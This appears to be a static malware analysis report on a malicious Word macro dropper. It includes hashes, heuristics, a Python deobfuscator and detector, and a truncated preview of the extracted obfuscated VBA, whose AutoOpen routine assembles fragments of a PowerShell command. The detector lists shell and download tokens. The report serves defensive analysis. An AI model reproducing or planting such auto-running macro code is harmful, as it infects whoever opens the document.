Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 30e8c00b1e8a226a…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 316.5 KB
Created: 2018-10-16 08:13:00
Authoring application: Microsoft Office Word
First seen: 2019-09-30
MD5: 05862fa2299320ff64e7d6f3e44e2ec8
SHA-1: d3ef0b6d6b0a8ef28ba0015352e04147020c333c
SHA-256: 30e8c00b1e8a226ac05a206072e2b421544f02122c707ccaaaaf80c5adf44e19
Risk score: 230

Malware Insights

MITRE ATT&CK
  T1059.005  Command and Scripting Interpreter: Visual Basic
  T1566.001  Phishing: Spearphishing Attachment

The sample is a Word OLE document carrying a VBA project whose NewMacros module defines a Sub AutoOpen, so the macro runs as soon as the document is opened with macros enabled. The recovered source is padded with large numbers of throwaway integer-arithmetic assignments (for example teueay = -164 + 36) and a run of helper functions that do nothing; the only meaningful work in AutoOpen is building strings by splitting them into short literals and re-joining them with &. The fragments visible in the preview ("iiz='t.W", "ebclie';$qhkeftohbouaigaj", "wuin='t-Sle';", ...) use the $name='...'; variable-assignment form of a PowerShell command line, and "te" & "mp" resolves to "temp", which fits the flagged Environ() call. Together with the CreateObject call and the ClamAV signature Doc.Dropper.Agent-7148214-0 this is consistent with a dropper that launches a scripted second stage; the full command and any download location cannot be recovered from the truncated preview, so no network indicators are attributed here. The legacy WordBasic finding keys on the same AutoOpen name, and its stock description ("no modern VBA project was recovered") is contradicted by the extracted macros.bas, so it should not be counted as independent evidence.
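To make the string-splitting concrete, the following added Python script (the editor's, not part of this report or of oletools) strips the arithmetic filler from a constructed excerpt of the AutoOpen routine shown in the macro preview and resolves the & concatenations in source order. The VBA lines are copied from the preview; the excerpt's selection of filler lines, the regexes and the function names are the editor's assumptions.

```python
import re

# Constructed excerpt of Sub AutoOpen() taken from the macros.bas preview in this
# report; the arithmetic filler lines between the string assignments are a
# representative subset, not the complete listing.
SAMPLE_VBA = r'''
Sub AutoOpen()
eiei97 = -25 + 11
abzwlahrh13 = "zahbviyeae"
hwraueg2 = "iiz='t.W"
cfsxjpfchtgzbji = -153 + 168
rsqjyuijg5 = "ebclie';$qhkeftohbouaigaj"
yiefvhxw = "wuin='t-Sle';"
oiabytx16 = "$lozimaga"
Dim gvoo, ypbycko As String
gvoo = -170 + 86
aljll = "grigcouowfgq79='ll32 $pa'"
jqibgdq = ";$kiyeneoaevjyowgkr=' -"
vggqmxyp = "rec';"
ohsvkfao = abzwlahrh13 & hwraueg2 & rsqjyuijg5 & yiefvhxw & oiabytx16 & aljll & jqibgdq & vggqmxyp
eouwkk = "te"
mxpt = "mp"
hweiuhge = eouwkk & mxpt
wcyeymd = "nsw"
End Sub
'''

# Filler: "<name> = <int> <op> <int>" assignments whose value is never used.
JUNK_RE = re.compile(r'^\s*\w+\s*=\s*-?\d+\s*[-+*/]\s*-?\d+\s*$')
DIM_RE = re.compile(r'^\s*Dim\b')
# name = "literal"   (VBA doubles a quote to escape it)
STR_ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*"((?:[^"]|"")*)"\s*$')
# name = a & b & c   (identifiers only; mixed literal/identifier joins are left alone)
CONCAT_RE = re.compile(r'^\s*(\w+)\s*=\s*(\w+(?:\s*&\s*\w+)+)\s*$')


def strip_junk(src):
    """Drop blank lines, bare Dim declarations and the arithmetic filler."""
    return [ln for ln in src.splitlines()
            if ln.strip() and not JUNK_RE.match(ln) and not DIM_RE.match(ln)]


def resolve_strings(lines):
    """Walk the cleaned source in order, recording string literals and
    evaluating '&' joins of already-known names.  Returns (env, derived):
    env maps every name to its string, derived lists the names built by joins.
    An unknown name inside a join is kept as a <placeholder> so partial
    listings (such as a truncated preview) still yield readable output."""
    env, derived = {}, []
    for ln in lines:
        m = STR_ASSIGN_RE.match(ln)
        if m:
            env[m.group(1)] = m.group(2).replace('""', '"')
            continue
        m = CONCAT_RE.match(ln)
        if m:
            parts = [p.strip() for p in m.group(2).split('&')]
            env[m.group(1)] = ''.join(env.get(p, '<' + p + '>') for p in parts)
            derived.append(m.group(1))
    return env, derived


def deobfuscate(src):
    """Return {name: recovered string} for every value assembled with '&'."""
    env, derived = resolve_strings(strip_junk(src))
    return {name: env[name] for name in derived}


if __name__ == '__main__':
    for name, value in deobfuscate(SAMPLE_VBA).items():
        print(name, '=', repr(value))
```

On the excerpt this yields two assembled values: hweiuhge becomes "temp", and ohsvkfao becomes a run of $name='...'; assignments whose quoted pieces ('t.Webclie', 't-Sle', 'll32 $pa', ' -rec') are themselves still fragments, so the real command is only reassembled further down the macro, past the point where the preview is cut off. Running the same pass over the full macros.bas rather than the preview is the first step before any dynamic analysis.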

Heuristics (8)

  • ClamAV: Doc.Dropper.Agent-7148214-0 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7148214-0
  • VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    The VBA project defines an AutoOpen procedure, which Word runs without user interaction once macros are enabled
  • CreateObject call (high) OLE_VBA_CREATEOBJ
    The macro instantiates a COM object through CreateObject, the usual route to a shell, scripting or download object
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) (low) OLE_VBA_ENVIRON
    The macro reads an environment variable through Environ(), commonly used to locate a writable drop path
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All nine URLs below are XML namespace identifiers (RDF, Adobe XMP/Photoshop/TIFF/EXIF, Dublin Core and OOXML DrawingML) left behind by embedded image metadata and drawing markup in the document body; none is reached from the macro, and they carry no indicator value for this sample.
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
    • http://ns.adobe.com/tiff/1.0/ (in document text, OLE body)
    • http://ns.adobe.com/exif/1.0/ (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
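The p-code heuristic in the list above keys on the co-occurrence of an auto-exec entry point and an execution token within one stream, regardless of whether source was recovered. The following added Python check (the editor's illustration, not the analysis platform's rule) reproduces that logic over byte buffers, matching each token in both ASCII and UTF-16LE form because identifier names can be stored either way inside OLE streams. The token lists are an assumed, illustrative subset, and the two sample buffers are constructed stand-ins, not real VBA stream layouts.

```python
# Procedure names Word/Excel invoke without user interaction (illustrative subset).
AUTOEXEC_TOKENS = ("AutoOpen", "AutoExec", "AutoClose", "Document_Open",
                   "Document_Close", "Workbook_Open", "Auto_Open")
# Shell / download / object-creation tokens (illustrative subset).
EXEC_TOKENS = ("Shell", "CreateObject", "WScript.Shell", "URLDownloadToFile",
               "XMLHTTP", "ADODB.Stream", "Environ", "powershell")


def find_tokens(blob, tokens):
    """Case-insensitive search of blob (bytes) for each token in ASCII and in
    UTF-16LE form.  Returns the matched tokens, sorted."""
    low = blob.lower()          # bytes.lower() only changes ASCII letters, so
    found = set()               # the \x00 bytes of UTF-16LE are untouched
    for tok in tokens:
        needle = tok.lower()
        if needle.encode('ascii') in low or needle.encode('utf-16-le') in low:
            found.add(tok)
    return sorted(found)


def pcode_autoexec_exec(blob):
    """Fire only when an auto-exec name AND at least one exec token co-occur."""
    auto = find_tokens(blob, AUTOEXEC_TOKENS)
    execs = find_tokens(blob, EXEC_TOKENS)
    return {"hit": bool(auto) and bool(execs), "autoexec": auto, "exec": execs}


# Constructed stand-ins (not real stream layouts): a compiled-only module that
# names AutoOpen in ASCII and CreateObject in UTF-16LE, and a benign one that
# has an AutoOpen handler but no execution token.
SUSPICIOUS_STREAM = (b"\x00\x01\x02" + b"AutoOpen" + b"\x00" * 4
                     + "CreateObject".encode("utf-16-le") + b"\xff" * 8 + b"NewMacros")
BENIGN_STREAM = b"\x00" * 4 + b"AutoOpen" + b"\x00" * 4 + b"ThisDocument"

if __name__ == "__main__":
    print(pcode_autoexec_exec(SUSPICIOUS_STREAM))
    print(pcode_autoexec_exec(BENIGN_STREAM))
```

The substring match is deliberately loose (Shell also hits WScript.Shell and ShellExecute), which is why a production rule weights tokens rather than treating every hit equally; this report rates the Environ() hit low for the same reason, and an auto-exec name alone, as in the benign buffer, never fires.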

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 207295 bytes
SHA-256: d972a6414e46f079920a63664794d85079d11443be3a7f10fad4e51d09b301a0

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Function uadpru()
Dim teueay As Integer
teueay = -164 + 36
abqyiu = -143 / 157
yiaiuzw = -85 * 91
Dim ieyszykdyq0 As String
ieyszykdyq0 = -72 + 85
End Function
Function kmbqeha()
gylyea = -58 - 23
End Function
Function uaoxs5(irnie)
oprfheiu95 = -151 * 90
End Function
Function uuzuo()
tinsicb = -141 - 138
yhjoigteo1 = -24 + 70
End Function
Function qfuwzfhhj(xqzaottl84, nkhmkhholl, ylie78)
rcwmte = -56 - 37
Dim xbkyizgra As Integer
xbkyizgra = -140 / 89
iglzgxopa = -151 / 83
yandnqnpqa = -27 / 102
End Function
Function askecn()
upmijzuucg = -42 + 140
ojwkvegjy = -86 * 36
wroherqkhap = -76 - 22
bdadwsl = -179 * 99
End Function
Function whxujb(ouuu)
ubvyxztay18 = -3 + 110
zvaxjhd5 = -174 * 27
uaki = -133 + 72
End Function
Function axbtk(uabudhn, dbdbuo)
smhhyd = -97 * 74
End Function
Function aoee()
Dim bwakedie As String
bwakedie = -67 * 156
ggkmkkj = -46 / 75
rqpzflogi = -159 - 156
End Function
Function pcyvytzjj(lxdcxkgj, caecbsu, jnesi)
yoslixdy = -148 - 155
weysv = -88 + 20
kighzxa4 = -36 * 155
End Function
Function ioea(ukmif, zgdjiu, eimbfhqtzd)
agzlpbgadcit = -87 + 1
oaxnmrvvfa = -34 + 158
End Function
Function jjpeosht(hhlaiw, rnumqcny, ambzdqqe)
gery58 = -11 / 16
kigmvfa = -139 + 126
mptydjoqe = -31 / 65
End Function
Function onkrmijhlg(tqjkmfy, iaeomp)
ucdsaohe = -167 / 38
zfzzsqxxtudf = -145 + 71
Dim azwnpeazpmm As String
azwnpeazpmm = -69 + 14
ikgthjbwqz = -90 + 108
End Function
Function isdayucb0(jqeart, ctlhe1)
Dim towbfezg, ufbmfjs, zxlykd, riffrfo As String
towbfezg = -155 + 48
dkzbyx = -171 * 89
nqxqyeurwo = -166 / 104
End Function
Function auwavr()
yhaurcrqhlk = -131 + 9
yaia = -140 + 126
crxjiqsi = -164 / 55
End Function
Function kjanbwbkz05(udjcnyx, iiizwowl, cjmvyti55)
xyjvma9 = -23 / 67
End Function
Function yoed()
hsoypwxaq34 = -69 * 141
anrzdgdee = -43 + 22
tkuidhagd = -119 / 45
deolhe = -8 - 135
End Function
Function eefkyiu0(ybmwdpyo8, zjcypfb)
Dim vqirzu As Integer
vqirzu = -30 * 51
dcuio = -177 - 157
yiairrryd = -157 / 98
End Function
Sub AutoOpen()
eiei97 = -25 + 11
eoghegfq = -119 + 103
abzwlahrh13 = "zahbviyeae"
hwraueg2 = "iiz='t.W"
cfsxjpfchtgzbji = -153 + 168
oppjkhheu = -52 - 175
yrhmtbhq = -79 * 18
giloii = -157 - 49
rsqjyuijg5 = "ebclie';$qhkeftohbouaigaj"
ymruhducuz = -87 / 26
vngajiyfa = -100 + 88
yiefvhxw = "wuin='t-Sle';"
kdfzdbqcnfp = -67 / 101
qdsjwsoglky = -55 / 99
efmoyy = -18 - 145
oiabytx16 = "$lozimaga"
Dim gvoo, ypbycko As String
gvoo = -170 + 86
aljll = "grigcouowfgq79='ll32 $pa'"
dzehpoi = -96 - 19
npmo = -50 + 148
fhqdrvlamma9 = -177 / 105
ktyqmnbo7 = -12 + 69
jqibgdq = ";$kiyeneoaevjyowgkr=' -"
egos = -174 / 12
tnshaia = -80 * 111
uqdonchjfu = -178 / 42
yyuuybj = -126 / 36
pgduap = -106 + 70
vggqmxyp = "rec';"
ohsvkfao = abzwlahrh13 & hwraueg2 & rsqjyuijg5 & yiefvhxw & oiabytx16 & aljll & jqibgdq & vggqmxyp
diioxuo60 = -151 * 8
Dim gkiowgyods As String
gkiowgyods = -54 / 82
Dim keoyeuup7, oufka, syebkyi, fwgadwoaku0 As Integer
keoyeuup7 = -19 * 127
iydy = -17 / 56
zsdqowro79 = -152 + 104
yqmeoc = -43 + 174
yziof = -60 - 117
iuuwtybrobw6 = -52 - 173
oozxuu = "kr+$oufglgclo"
jvavmu = -158 + 154
expyor = -49 - 91
dtxmnii = "dvmvyobryue+$tjhbshfophv"
dvalgiadhzki5 = -46 / 43
Dim rpyuaaurc As Integer
rpyuaaurc = -174 - 103
Dim ogeiadvxw As String
ogeiadvxw = -101 / 96
eouwkk = "te"
Dim vvxeyywn As String
vvxeyywn = -5 - 69
mxpt = "mp"
oyeoas = -163 - 47
ouleve = -106 / 59
uiymcugdii = -145 - 113
eiviy = -93 - 160
hweiuhge = eouwkk & mxpt
ewcuou = -73 + 109
ipmjxoyoe47 = -97 * 174
ypnaaa = -10 + 98
wcyeymd = "nsw"
xaeoyuehg = -70 + 28
eaop = -130 / 159
ilnyie = "qzggavz+$hdaanyeznob"
ixwaeeh = -112 + 97
jr
... (truncated)